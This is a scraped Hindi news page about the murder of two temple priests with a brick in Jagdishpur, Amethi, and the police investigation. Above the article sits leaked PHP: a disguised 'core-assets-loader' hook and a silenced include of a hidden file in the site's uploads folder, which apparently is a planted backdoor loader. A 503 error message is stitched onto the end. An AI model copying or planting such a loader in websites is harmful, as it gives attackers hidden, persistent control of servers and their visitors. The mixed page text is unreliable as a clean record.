add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); मंदिर में 2 पुजारियों की ईंट से कूचकर हत्‍या, जांच में जुटी पुलिस – SOCH INDIA
Menu

अपराध समाचार
मंदिर में 2 पुजारियों की ईंट से कूचकर हत्‍या, जांच में जुटी पुलिस

nobanner
अमेठी. जगदीशपुर के घासी बाबा मंदिर परिसर में पत्‍थर से कूचकर पुजारियों की हत्या करने का मामला सामने आया है। अज्ञात बदमाशों ने पत्‍थर से कुचलकर 2 पुजारियों की निर्मम हत्या कर दी। मामला देर रात का बताया जाता है। मंगलवार सुबह जब लोग मंदिर गए तो वहां पु‍जारियों की लाश मिली। सूचना पर पहुंची पुलिस ने शवों को पोस्‍टमॉर्टम के लिए भेज दिया। पुलिस जांच में जुटी है।
लाश के पास पड़ी थी खून से सनी ईंट
– मामला जगदीशपुर थाना क्षेत्र के बाबूपुर सरैया गांव का है।
– यहां के जगदीशपुर जायस मार्ग के किनारे घासी बीर बाबा का मंदिर स्थित है।
– इसी मंदिर में पास के गांव गौतमपुर और अदिलपुर के चंद्रमणि और सीताराम काफी दिनों से पूजा अर्चना करते थे और मंदिर की सेवा करते थे।
– मंगलवार सुबह ग्रामीण जब पूजा अर्चना के लिए मंदिर पहुंचे तो वहां दोनों की हत्‍या कर दी गई थी।
– इनकी लाश के पास ही खून से सनी ईंट पड़ी थी, जिससे अंदाजा लगाया जा सकता था कि दोनों की हत्या ईंट से कूचकर की गई है।
– ग्रामीणों ने तत्काल इसकी सूचना पुलिस को दी।
– मौके पर पहुंची पुलिस ने दोनों शवों को पोस्टमार्टम के लिए भेज दिया।
– डीआईजी राकेश चंद्र साहू ने मामले के लिए एक पुलिस टीम को गठित कर दी है।
ग्रामीणों ने नशेड़ियों पर जताई हत्‍या की आशंका
– ग्रामीणों के अनुसार मंदिर परिसर के आसपास काफी दिनों से स्मैकिओं और नसेड़िओं का आना जाना था।
– कई बार मंदिर के पुजारी ने उन्हें टोका भी था, जिससे वो लोग गुस्से में थे और आए दिन यहां उत्पात मचाते थे।
503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.